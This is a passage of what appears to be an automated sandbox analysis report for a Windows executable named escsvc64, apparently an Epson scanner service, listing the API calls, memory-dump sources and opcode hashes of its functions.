            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: AddressExitHandleModuleProcProcess
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 75539706-1276376045
            • Opcode ID: 83038e842e64aeba14171e32d07205d5f8d0562140aa5abcf553098547ecfbf7
            • Instruction ID: 55edfa6310dd0622b2002cc7331f8db003e515954a46d7483bd0e06cf4709e31
            • Opcode Fuzzy Hash: 83038e842e64aeba14171e32d07205d5f8d0562140aa5abcf553098547ecfbf7
            • Instruction Fuzzy Hash: 1CE0EC70311B1151FF5B9B62E8943A512666B4D780F081429BA5A4B3B0EEBD840C9300
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: AdjustPointer
            • String ID:
            • API String ID: 1740715915-0
            • Opcode ID: 85524f391991ec340317f264c6d2d5d97c9bca659d756e659cf024a3c4dd6266
            • Instruction ID: 76f57fd6b63c4bba905e11c316f372108bc4d4ed8de678a137f391912bbd476c
            • Opcode Fuzzy Hash: 85524f391991ec340317f264c6d2d5d97c9bca659d756e659cf024a3c4dd6266
            • Instruction Fuzzy Hash: 45C11930118E0A9FDB29DF588040276B2D0FBD571BB64466FDC86CB257EA28DCC98789
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: AdjustPointer
            • String ID:
            • API String ID: 1740715915-0
            • Opcode ID: 6fadff9372363955ae653530a4e92bab46242c9f9ad5856ddd2d2fb6fafb04b9
            • Instruction ID: 86d43945fb91ae2073277537c466f3923ab9ccee3ff6691bb59e917e620bf1bf
            • Opcode Fuzzy Hash: 6fadff9372363955ae653530a4e92bab46242c9f9ad5856ddd2d2fb6fafb04b9
            • Instruction Fuzzy Hash: 92D10572118E0E8FEBEBDB5884413F572D0FB9D391F54C56DB48ACB186EE20DA498385
            APIs
            • GetStartupInfoA.KERNEL32 ref: 0000000140008466
              • Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90
            • GetFileType.KERNEL32 ref: 000000014000860C
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: FileInfoSleepStartupType
            • String ID:
            • API String ID: 1527402494-0
            • Opcode ID: cba840f5acbdaf61da99ed994bd72b21301df9ac7cfb0dfc9d6f44c4c51fbe36
            • Instruction ID: 9ec098995d62ce09c4685074e2e5a57aa7930796f03975d98b598ac7bf0dcf8a
            • Opcode Fuzzy Hash: cba840f5acbdaf61da99ed994bd72b21301df9ac7cfb0dfc9d6f44c4c51fbe36
            • Instruction Fuzzy Hash: 0B91ADB2604B8085EB72CB26E8487993A95F7197B4F254325EFB9473F1EB7AC841C701
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ServiceStatus$Event
            • String ID:
            • API String ID: 3225596143-0
            • Opcode ID: d33ebfa21478c44a2b4229f9ec37f48baa9755fe043f6f9d422456950182cdc3
            • Instruction ID: 267da8374e0204dd645fd918fc07667eae96e170f0cb4894acbc5a21a37544f2
            • Opcode Fuzzy Hash: d33ebfa21478c44a2b4229f9ec37f48baa9755fe043f6f9d422456950182cdc3
            • Instruction Fuzzy Hash: 4741B2B49016408BFB67CF6BF880BD47AB4B79C3D8F04811AEA4D8B670DB7A85448B04
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: CommandLine$ByteCharErrorLastMultiWide
            • String ID:
            • API String ID: 3078728599-0
            • Opcode ID: e08104ef58c5b7a0e93a651a31a02ccca22a156db734b767f670521c42133e35
            • Instruction ID: dbc5816ed4fa3de7f18b23a09a72020ca8908b93386790fa4ffafd35d39d8284
            • Opcode Fuzzy Hash: e08104ef58c5b7a0e93a651a31a02ccca22a156db734b767f670521c42133e35
            • Instruction Fuzzy Hash: 06315E71615A5082E7628F12B84478A67E0F78DBD0F540125FF898BBB8DB7DC5428B00
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
            • String ID:
            • API String ID: 1850339568-0
            • Opcode ID: 1212426c9a6d3a13bc232f4aa453472932cbfef3c4738367fd966b73ce934767
            • Instruction ID: d3d35c4d5cd4b0ecb72ff258d36a5aae06955c4e2a1dc75f7bddf35bfaf35452
            • Opcode Fuzzy Hash: 1212426c9a6d3a13bc232f4aa453472932cbfef3c4738367fd966b73ce934767
            • Instruction Fuzzy Hash: 78311C71604A4182EB12DB22F85539673A0F78D7B4F500316FBAD4BAF4DBBAC585CB10
            APIs
            • GetLastError.KERNEL32(?,?,?,0000000140003B5E), ref: 000000014000624A
            • FlsGetValue.KERNEL32(?,?,?,0000000140003B5E), ref: 0000000140006258
            • SetLastError.KERNEL32(?,?,?,0000000140003B5E), ref: 00000001400062B3
              • Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90
            • FlsSetValue.KERNEL32(?,?,?,0000000140003B5E), ref: 0000000140006284
              • Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
              • Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32 ref: 0000000140006089
              • Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060D8
              • Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060F0
            • GetCurrentThreadId.KERNEL32 ref: 0000000140006298
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread
            • String ID:
            • API String ID: 2474595895-0
            • Opcode ID: 11a1c2b9ce6cae87f56cc3a97f503640f7858b5fc67d15d9ec78c283fe98477f
            • Instruction ID: b64a60eea287b767be27ce808611aed3f311df57d353ba07e377f7b491abde7b
            • Opcode Fuzzy Hash: 11a1c2b9ce6cae87f56cc3a97f503640f7858b5fc67d15d9ec78c283fe98477f
            • Instruction Fuzzy Hash: 2A014C70200B0186FB56EF73B4583E92292EB8CBE0F484224FB661B3F5EE78C8048600
            APIs
            • GetLastError.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061BA
            • FlsGetValue.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061C8
            • SetLastError.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006223
              • Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90
            • FlsSetValue.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061F4
              • Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
              • Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32 ref: 0000000140006089
              • Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060D8
              • Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060F0
            • GetCurrentThreadId.KERNEL32 ref: 0000000140006208
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread
            • String ID:
            • API String ID: 2474595895-0
            • Opcode ID: 3df6b742ed069dc10a990c89e0a00f9449d85f0a5b3961fb99b29ae4aa2903f0
            • Instruction ID: fd70356aea30289e2ff4ef2970fb409e0440e4843ff398306ddbe7ed0b522322
            • Opcode Fuzzy Hash: 3df6b742ed069dc10a990c89e0a00f9449d85f0a5b3961fb99b29ae4aa2903f0
            • Instruction Fuzzy Hash: E9016270601B0186FB56EFB3B4583A92692EB8CBE0F484224FF661B3F5EE7CC4458611
            APIs
            • __except_validate_context_record.LIBVCRUNTIME ref: 00455BC8
            • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00455CB0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
            • String ID: csm$csm
            • API String ID: 3896166516-3733052814
            • Opcode ID: b5d7381fdd729d40f201ae6ed7f1741eaecd7a76e3394a9f35f9a9b9338acbd8
            • Instruction ID: 41dbf1cd390d1182d46982be1885cc9aa499d9fea12d7f7de77fe435d0e00611
            • Opcode Fuzzy Hash: b5d7381fdd729d40f201ae6ed7f1741eaecd7a76e3394a9f35f9a9b9338acbd8
            • Instruction Fuzzy Hash: 2F616E31614F088BCB689F58909837573E1FB58316F64465FE889C7397CB38D889CB8A
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
            • String ID: csm$csm
            • API String ID: 3896166516-3733052814
            • Opcode ID: dfee173dcd499577b71966c6b9e68e04b1d122c49cf8e12d755bea0b90d5e3af
            • Instruction ID: 6f0966b1c37cdfb9bfd8f54508303ee82dc0ab7b6ab2dafb2caee482863340a0
            • Opcode Fuzzy Hash: dfee173dcd499577b71966c6b9e68e04b1d122c49cf8e12d755bea0b90d5e3af
            • Instruction Fuzzy Hash: 10715D30614A4D8FEBE9DF18C4887A673D1EB5C352F54865AF489C7292DF70DA88C782
            APIs
              • Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70
              • Part of subcall function 0000000140004A40: RtlCaptureContext.KERNEL32 ref: 0000000140004A51
              • Part of subcall function 0000000140004A40: IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
              • Part of subcall function 0000000140004A40: SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
              • Part of subcall function 0000000140004A40: UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
              • Part of subcall function 0000000140004A40: GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
              • Part of subcall function 0000000140004A40: TerminateProcess.KERNEL32 ref: 0000000140004ACE
            • GetModuleHandleA.KERNEL32 ref: 000000014000CE2D
            • GetProcAddress.KERNEL32 ref: 000000014000CE42
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$AddressCaptureContextCurrentDebuggerHandleModulePresentProcTerminateValue
            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
            • API String ID: 1369895830-3733552308
            • Opcode ID: 6d8b5d62b63a9c4ae9bd89e2a175ac80a50603bd7851d00847f4974ceda82b2b
            • Instruction ID: 49e8813b4deb30a237d27fc7e6402217b36d86e19928ae94c256e37d805b8284
            • Opcode Fuzzy Hash: 6d8b5d62b63a9c4ae9bd89e2a175ac80a50603bd7851d00847f4974ceda82b2b
            • Instruction Fuzzy Hash: F9214D71625B9182EB56DB13F8007DAA3A6B79C7C0F880126BB4E47775EF78C404C704
            APIs
            • RegisterServiceCtrlHandlerExW.ADVAPI32 ref: 0000000140001220
            • SetServiceStatus.ADVAPI32 ref: 000000014000128C
            • SetServiceStatus.ADVAPI32 ref: 00000001400012DF
              • Part of subcall function 0000000140001460: CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 0000000140001481
              • Part of subcall function 0000000140001460: CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400014A3
              • Part of subcall function 0000000140001460: RegisterDeviceNotificationW.USER32 ref: 0000000140001528
              • Part of subcall function 0000000140001460: SetServiceStatus.ADVAPI32 ref: 000000014000156E
              • Part of subcall function 0000000140001460: WaitForMultipleObjects.KERNEL32 ref: 00000001400015A8
              • Part of subcall function 0000000140001460: UnregisterDeviceNotification.USER32 ref: 00000001400015C9
              • Part of subcall function 0000000140001460: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015E0
              • Part of subcall function 0000000140001460: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015FC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Service$Status$CloseCreateDeviceEventHandleNotificationRegister$CtrlHandlerMultipleObjectsUnregisterWait
            • String ID: EpsonScanSvc
            • API String ID: 498100820-1444984947
            • Opcode ID: a5d94d1c1bc15c57b6d9f01a09ccb7c220a53ae407c958d311d4c21d33b5df47
            • Instruction ID: 597997962a0f345a41b2b22026f52100171705740471e8a7026cae0ea810d904
            • Opcode Fuzzy Hash: a5d94d1c1bc15c57b6d9f01a09ccb7c220a53ae407c958d311d4c21d33b5df47
            • Instruction Fuzzy Hash: E52190B06116108BFB578F56F854BD13AB5B74C7D8F44411AFA8D8B271CBBE84498B44
            APIs
            • _CallSETranslator.LIBVCRUNTIME ref: 004556DB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: CallTranslator
            • String ID: MOC$RCC
            • API String ID: 3163161869-2084237596
            • Opcode ID: 41de56702f982b64fe2f38222c95c0c4c6bb52bfbfe6eb78f609202fb18988d9
            • Instruction ID: a917e7c52979a002b4e908c14a8e17dfce2e1bba01026d5f22eee223206ce27b
            • Opcode Fuzzy Hash: 41de56702f982b64fe2f38222c95c0c4c6bb52bfbfe6eb78f609202fb18988d9
            • Instruction Fuzzy Hash: CCA1A430518F488FCB14EF68C4959A9BBF0FB99309F14465EE849C7252DB38E585CB86
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: CallTranslator
            • String ID: MOC$RCC
            • API String ID: 3163161869-2084237596
            • Opcode ID: 363d6bb0ba7862c09730f605770ad3bf4a01eab7ca613770e0679e36364e9edf
            • Instruction ID: 782d132307fa3ec13c881fd6add66bb0f9351700a0533e7473bfc9cd57bf72e9
            • Opcode Fuzzy Hash: 363d6bb0ba7862c09730f605770ad3bf4a01eab7ca613770e0679e36364e9edf
            • Instruction Fuzzy Hash: 18A1C130518B488FDB55EF28C485BE9BBE0FB99344F14865EF489C7192DF34A685CB82
            APIs
            • __except_validate_context_record.LIBVCRUNTIME ref: 00455E02
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: __except_validate_context_record
            • String ID: csm$csm
            • API String ID: 1467352782-3733052814
            • Opcode ID: 344832f059a35b2f2b4cab6af87e1e87aee7c388f65b12589a663b30c40c0269
            • Instruction ID: 1b1c56f56830841ea04eb985c52123fce8d7edecec28d44a7443fa15cfef9970
            • Opcode Fuzzy Hash: 344832f059a35b2f2b4cab6af87e1e87aee7c388f65b12589a663b30c40c0269
            • Instruction Fuzzy Hash: CD710530218E448BCB68DF18C494279B7E1FB98716F54426FEC8DC7297DB389989C786
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: __except_validate_context_record
            • String ID: csm$csm
            • API String ID: 1467352782-3733052814
            • Opcode ID: 20aa8ab74dc3e8fd67a9e3c7bb82e1dcf2a23def2c78b1fd2bc7fe295e731d49
            • Instruction ID: 81675698e28cb140139ea40df420a562aeb6be9398de3bb29cb6a4704c2524ca
            • Opcode Fuzzy Hash: 20aa8ab74dc3e8fd67a9e3c7bb82e1dcf2a23def2c78b1fd2bc7fe295e731d49
            • Instruction Fuzzy Hash: FF811930508A498BDBAADF18C0843F5B7D1FB9D345F14C16DF489CB2A6DE349A85C782
            APIs
            • __except_validate_context_record.LIBVCRUNTIME ref: 00453C3B
            • _IsNonwritableInCurrentImage.LIBCMT ref: 00453CD2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: CurrentImageNonwritable__except_validate_context_record
            • String ID: csm
            • API String ID: 3242871069-1018135373
            • Opcode ID: cf8e509d570c1848d0f9797bc63c7dafb47f65f362302048ea0467d3f3ad287b
            • Instruction ID: 9193cab18bdc160d15f731e8d57740147f9db24268e610c38568c9abcd6ebcf8
            • Opcode Fuzzy Hash: cf8e509d570c1848d0f9797bc63c7dafb47f65f362302048ea0467d3f3ad287b
            • Instruction Fuzzy Hash: EC61D530208A088BCF28EE5CD48567577F1FB55392F10456FEC86C3257EA39ED598B89
            APIs
            • _CallSETranslator.LIBVCRUNTIME ref: 0045545B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: CallTranslator
            • String ID: MOC$RCC
            • API String ID: 3163161869-2084237596
            • Opcode ID: 61cf8898ebdfdc3fdd320f5ed4e2e062973869c9246d2cdf7cee2fcfd1f74536
            • Instruction ID: 5757a0e22f1a45b1ee541d986a9736cf9731e51bf38c43b03fbf5a3676040a5b
            • Opcode Fuzzy Hash: 61cf8898ebdfdc3fdd320f5ed4e2e062973869c9246d2cdf7cee2fcfd1f74536
            • Instruction Fuzzy Hash: 6571B330518B489FD724EF18C442BAAB7E0FB99315F144A5EE889C3212DB78E585CB87
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: CallTranslator
            • String ID: MOC$RCC
            • API String ID: 3163161869-2084237596
            • Opcode ID: cbdf1a0405eeeb9ee19cbaa3932b057c3defabee4b796518833c7a9b81170068
            • Instruction ID: 2573f572de498be4df4f1860bd609dea17f29197c62f27e4b8dccf343337cd0c
            • Opcode Fuzzy Hash: cbdf1a0405eeeb9ee19cbaa3932b057c3defabee4b796518833c7a9b81170068
            • Instruction Fuzzy Hash: 8D719230518B4C8FE7A5DF18C446BE6B7E0FB9C345F508A5EE4C9C3252DB74A5858B82
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: CurrentImageNonwritable__except_validate_context_record
            • String ID: csm
            • API String ID: 3242871069-1018135373
            • Opcode ID: df8b22781e2b7e9397aa037661e54ee7935159f332a0a33616de54d4796eae03
            • Instruction ID: 2d8cbc02748ef7321837904150ba0fde8245bbbc29b9dd48ee64278b709af079
            • Opcode Fuzzy Hash: df8b22781e2b7e9397aa037661e54ee7935159f332a0a33616de54d4796eae03
            • Instruction Fuzzy Hash: D871D930618A4C4BEBAAEE1DD4867B477D5EB58390F10826DF84AC32C6EE34ED558781
            APIs
            • __except_validate_context_record.LIBVCRUNTIME ref: 0045651A
            • _CreateFrameInfo.LIBVCRUNTIME ref: 00456543
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: CreateFrameInfo__except_validate_context_record
            • String ID: csm
            • API String ID: 2558813199-1018135373
            • Opcode ID: 20d9dd5868b5ec9e0a42498d2107ce69bc8ea7373916fa7eb109017716fd0d1a
            • Instruction ID: 56dcee641f37f6566c3688a03976590f84b1c0741d70bcb91f50f0da27585437
            • Opcode Fuzzy Hash: 20d9dd5868b5ec9e0a42498d2107ce69bc8ea7373916fa7eb109017716fd0d1a
            • Instruction Fuzzy Hash: E75173B1918B099FC760EF2DC48666AB7E0FB58356F50055FE889C3222DB34E945CB86
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: CreateFrameInfo__except_validate_context_record
            • String ID: csm
            • API String ID: 2558813199-1018135373
            • Opcode ID: ce40aefc9edf07df887317f444d5c0bd08fe4ad5eae95838032d3f9405fedf99
            • Instruction ID: f7c9971cb605d5fff1342d11b9a52e1eaddacd09fb7810c935e50d82192d7268
            • Opcode Fuzzy Hash: ce40aefc9edf07df887317f444d5c0bd08fe4ad5eae95838032d3f9405fedf99
            • Instruction Fuzzy Hash: 695190B1518B489FE7A1EF2880467A977E0FB5D391F10455EF189C7262CF30EA45CB82